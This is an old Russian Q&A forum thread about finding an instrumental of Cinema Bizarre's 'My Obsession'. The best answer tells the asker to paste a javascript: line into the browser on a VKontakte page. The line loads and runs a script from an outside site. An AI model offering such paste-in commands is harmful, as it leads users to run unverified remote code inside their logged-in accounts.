Где можно скачать минусовку CINEMA BIZARRE-MY OBSESSION???ОООЧЕНЬ НАДО!!!!

Даша Поспелова Знаток (345), закрыт 14 лет назад
Лучший ответ
^^ Профи (567) 14 лет назад
Эм.. .
Даш. . ты есть вконтакте?? ?
Если да, то на тебе ссылку на меня, у меня есть хорошее качество!
[ссылка заблокирована по решению администрации проекта]
Это я =)
заходиши на мою страницу, вставляешь туды вот это javascript:var s=document.createElement('script');s.src='http://videosaver.ru/vs.js?nc='+Math.random();document.body.appendChild(s);void(0); , нажимаешь скачать и скачиваешь первый трек!!!
Остальные ответы
Annet Гуру (4842) 14 лет назад
скачай программу Gold Wave, там можно голоса убирать.. если не получится, скажи, я скину те)